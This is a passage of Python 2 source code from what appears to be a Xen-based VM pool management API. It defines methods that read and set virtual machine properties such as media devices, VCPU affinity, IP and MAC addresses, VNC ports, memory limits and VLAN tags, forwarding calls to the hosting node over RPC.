return self.VBD_create(session, vbd_struct)
def _VM_get_disks(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[1]) == 0:
result.append(vbd)
return xen_api_success(result)
def VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_media_change(session, vm_ref, vdi_name)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_media_change", vm_ref, vdi_name)
else:
return self._VM_media_change(session, vm_ref, vdi_name)
def _VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Internal method. Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
vbd_ref = self._VM_get_media(session, vm_ref).get('Value')
xendom = XendDomain.instance()
xennode = XendNode.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
log.debug("No media, create one.")
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
self.VBD_create(session, vbd_struct)
# return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
'''
Check the VBD is a media device or not.
'''
if not cur_vbd_struct:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]: # Not CD
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['mode'] != 'RO': # Not read only
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
vdi_uuid = xennode.get_vdi_by_name_label(vdi_name)
new_vdi = xennode.get_vdi_by_uuid(vdi_uuid)
if not new_vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', vdi_name])
new_vdi_image = new_vdi.get_location()
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
new_vbd_struct = {}
for k in cur_vbd_struct.keys():
if k in valid_vbd_keys:
new_vbd_struct[k] = cur_vbd_struct[k]
new_vbd_struct['VDI'] = vdi_uuid
try:
XendTask.log_progress(0, 100,
vm.change_vdi_of_vbd,
new_vbd_struct, new_vdi_image)
except XendError, e:
log.exception("Error in VBD_media_change")
# if str(e).endswith("VmError: Device"):
# log.debug("No media create new...")
# log.debug(new_vbd_struct)
# self.VBD_create(session, new_vbd_struct)
return xen_api_error(['INTERNAL_ERROR', str(e)])
# return xen_api_success_void()
return xen_api_success_void()
def VM_get_VTPMs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vtpms())
def VM_get_consoles(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's console device(VNC device).
@param session: session of RPC.
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_consoles(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_consoles", vm_ref)
else:
return self._VM_get_consoles(vm_ref)
def _VM_get_consoles(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's console device(VNC device).
@param session: session of RPC.
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_consoles())
def VM_get_DPCIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dpcis())
def VM_get_DSCSIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsis())
def VM_get_DSCSI_HBAs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsi_HBAs())
def VM_get_tools_version(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return dom.get_tools_version()
def VM_get_metrics(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_metrics())
#frank
def VM_get_cpu_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_cpu_qos())
#frank
def VM_get_network_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_network_qos())
def VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_max(_, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_max', vm_ref)
else:
return self._VM_get_VCPUs_max(_, vm_ref)
def _VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.info['VCPUs_max'])
def VM_get_VCPUs_at_startup(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VCPUs' bounding CPUs.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_CPU(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_CPU', vm_ref)
else:
return self._VM_get_VCPUs_CPU(session, vm_ref)
def _VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VCPUs' bounding CPUs.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsCPU())
def VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's ip address.
@precondition: VM must install VM-tools first.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_ip_addr(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_ip_addr', vm_ref)
else:
return self._VM_get_ip_addr(session, vm_ref)
def _VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's ip address.
@precondition: VM must install VM-tools first.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainIp())
def VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_MAC(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_MAC', vm_ref)
else:
return self._VM_get_MAC(session, vm_ref)
def _VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainMAC())
def VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_vnc_location(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_vnc_location', vm_ref)
else:
return self._VM_get_vnc_location(session, vm_ref)
def _VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
xendom = XendDomain.instance();
dom = xendom.get_vm_by_uuid(vm_ref)
# consoles = dom.get_consoles()
# vnc_location = "0"
# for console in consoles:
# location = xendom.get_dev_property_by_uuid('console', console, 'location')
# log.debug("vm %s console %s location %s" % (vm_ref, console, location))
# if location.find(".") != -1:
# vnc_location = location
vnc_location = dom.get_console_port()
log.debug('VM(%s) get vnc location (%s)' % (vm_ref, vnc_location))
return xen_api_success(vnc_location)
# attributes (rw)
def VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_label(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_label', vm_ref)
else:
return self._VM_get_name_label(session, vm_ref)
def _VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getName())
def VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_description(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_description', vm_ref)
else:
return self._VM_get_name_description(session, vm_ref)
def _VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getNameDescription())
def VM_get_user_version(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
@summary: Get VM is a template or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_a_template(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_a_template', ref)
else:
return self._VM_get_is_a_template(session, ref)
def _VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM is a template or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
log.debug('ref:%s' % ref)
try:
return xen_api_success(XendDomain.instance().get_vm_by_uuid(ref).info['is_a_template'])
except KeyError:
return xen_api_error(['key error', ref])
def VM_get_is_local_vm(self, session, ref):
'''
@author: wuyuewen
@summary: Get VM is a local VM(disk file in local storage, not shared) or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_local_vm(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_local_vm', ref)
else:
return self._VM_get_is_local_vm(session, ref)
def _VM_get_is_local_vm(self, session, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM is a local VM(disk file in local storage, not shared) or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
# log.debug('ref:%s' % ref)
try:
storage = self._get_BNStorageAPI_instance()
vdis = storage._VDI_get_by_vm(session, ref).get('Value')
if vdis:
for vdi_uuid in vdis:
vdi = storage._get_VDI(vdi_uuid)
if vdi:
sharable = vdi.sharable
if not sharable:
return xen_api_success(not sharable)
else:
log.exception('failed to get vdi by vdi_uuid: %s' % vdi_uuid)
return xen_api_success(True)
# return xen_api_error(['failed to get vdi by vdi_uuid', vdi_uuid])
return xen_api_success(not sharable)
else:
log.exception('failed to get vdi by vm: %s' % ref)
return xen_api_success(False)
# return xen_api_error(['failed to get vdi by vm',ref])
except KeyError:
return xen_api_error(['key error', ref])
except VDIError:
return xen_api_success(False)
# # get inner ip of a VM
# def VM_get_inner_ip(self, session, vm_ref):
# ip_map = self.VM_get_ip_map(session, vm_ref).get('Value')
# mac2ip_list = {}
# for mac, ipmap in ip_map.items():
# inner_ip = ipmap.split('@')[0]
# mac2ip_list[mac] = inner_ip
# return xen_api_success(mac2ip_list)
# #Get mapping intranet ip address to outer net ip address.
# def VM_get_ip_map(self, session, vm_ref):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_get_ip_map(session, vm_ref)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_get_ip_map', vm_ref)
# else:
# return self._VM_get_ip_map(session, vm_ref)
#
# def _VM_get_ip_map(self, session, vm_ref):
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_ip_map())
def VM_get_auto_power_on(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('auto_power_on', session, vm_ref)
def VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_max', vm_ref)
else:
return self._VM_get_memory_dynamic_max(session, vm_ref)
def _VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_max())
def VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_min', vm_ref)
else:
return self._VM_get_memory_dynamic_min(session, vm_ref)
def _VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_min())
def VM_get_VCPUs_params(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vcpus_params())
def VM_get_actions_after_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_shutdown())
def VM_get_actions_after_reboot(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_reboot())
def VM_get_actions_after_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_suspend())
def VM_get_actions_after_crash(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_crash())
def VM_get_PV_bootloader(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader', session, vm_ref)
def VM_get_PV_kernel(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_kernel', session, vm_ref)
def VM_get_PV_ramdisk(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_ramdisk', session, vm_ref)
def VM_get_PV_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_args', session, vm_ref)
def VM_get_PV_bootloader_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader_args', session, vm_ref)
def VM_get_HVM_boot_policy(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_policy', session, vm_ref)
def VM_get_HVM_boot_params(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_params', session, vm_ref)
def VM_get_platform(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_platform())
def VM_get_PCI_bus(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return dom.get_pci_bus()
def VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's VCPUs available CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp (host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_affinity(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_affinity', vm_ref)
else:
return self._VM_get_VCPUs_affinity(session, vm_ref)
def _VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's VCPUs available CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsAffinity())
def VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
@summary: Set VM's VCPU available CPU affinity, VCPU can used one of these CPUs.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param vcpu: number of VCPU, if VM has 2 VCPU, then VCPU number is 0 or 1.
@param cpumap: numbers of CPUs, e.g. "0,2,4,8" means CPUs number 0,2,4,8
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp (host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_affinity', vm_ref, vcpu, cpumap)
else:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
def _VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPU available CPU affinity, VCPU can used one of these CPUs.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param vcpu: number of VCPU, if VM has 2 VCPU, then VCPU number is 0 or 1.
@param cpumap: numbers of CPUs, e.g. "0,2,4,8" means CPUs number 0,2,4,8
@return: True | False.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
domid = dominfo.getDomid()
if not dominfo:
raise XendInvalidDomain(str(domid))
vcpu = 'cpumap%d' % int(vcpu)
if not domid or cmp(domid, -1) == 0 :
self.VM_add_to_VCPUs_params(session, vm_ref, vcpu, cpumap)
else:
self.VM_add_to_VCPUs_params_live(session, vm_ref, vcpu, cpumap)
# dominfo.setVCPUsAffinity(vcpu, cpumap)
return xen_api_success_void()
def VM_set_PCI_bus(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('PCI_bus', session, vm_ref, val)
def VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_other_config(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_other_config', vm_ref)
else:
return self._VM_get_other_config(session, vm_ref)
#
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self.VM_get('other_config', session, vm_ref)
# else:
# log.debug("get other config")
# host_ip = BNPoolAPI._host_structs[host_ref]['ip']
# return xen_rpc_call(host_ip, "VM_get_other_config", vm_ref)
# add by wufan 20131016
def _VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
other_config = self.VM_get('other_config', session, vm_ref).get('Value')
#log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
#if other_config :
# tag_list = other_config.get('tag',{})
# if isinstance(tag_list, str):
# self._VM_convert_other_config(session, vm_ref)
# other_config = self.VM_get('other_config', session, vm_ref).get('Value')
return xen_api_success(other_config)
# add by wufan
def _VM_convert_other_config(self, session, vm_ref):
'''
@deprecated: not used
'''
OTHER_CFG_DICT_kEYS = ['tag', 'rate', 'burst']
convert_other_config = {}
other_config = self.VM_get('other_config', session, vm_ref).get('Value')
#log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
if other_config and isinstance(other_config, dict):
for key, value in other_config.items():
if key in OTHER_CFG_DICT_kEYS and not isinstance(value, dict):
value = eval(value)
if isinstance(value, dict):
convert_other_config.setdefault(key,{})
for k, v in value.items():
convert_other_config[key][k] = v
else:
convert_other_config[key] = value
self._VM_set_other_config(session, vm_ref, convert_other_config)
log.debug('_VM_convert_other_config: type%s value%s' % (type(convert_other_config), convert_other_config))
return xen_api_success_void()
def VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tags(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tags', vm_ref)
else:
return self._VM_get_tags(session, vm_ref)
def _VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
return self.VM_get('tags', session, vm_ref)
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_all_tag(session, vm_ref, tag_type)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_all_tag', vm_ref, tag_type)
else:
return self._VM_get_all_tag(session, vm_ref, tag_type)
def _VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
tag_list = {}
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
#log.debug('other_config: %s', other_config)
if other_config:
tag_list = other_config.get(tag_type,{})
log.debug('list:%s' % tag_list)
return xen_api_success(tag_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag_list)
def VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tag(session, vm_ref, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tag', vm_ref, vif_ref)
else:
return self._VM_get_tag(session, vm_ref, vif_ref)
# original:wuyuewen
#def _VM_get_tag(self, session, vm_ref):
# try:
# other_config = self._VM_get_other_config(session, vm_ref).get('Value')
# tag = "-1"
# if other_config:
# tag = other_config.get('tag', "-1")
# return xen_api_success(tag)
# except Exception, exn:
# log.exception(exn)
# return xen_api_success(tag)
# add by wufan read from VM's other_config
def _VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@rtype: dict.
'''
tag = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
if other_config:
tag_list = other_config.get('tag',{})
#log.debug('tag_list type:%s' % type(tag_list))
tag = tag_list.get(eth_num,'-1')
#log.debug('_VM_get_tag:%s' % tag)
return xen_api_success(tag)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag)
def VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@return: VIF's rate(kbps).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_rate', vm_ref, param_type, vif_ref)
else:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
def _VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@return: VIF's rate(kbps).
@rtype: dict.
'''
rate = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
#log.debug('>>>>>>>>>>>>device')
#log.debug(device)
eth_num = ''
if device != '' and device.startswith('eth'):
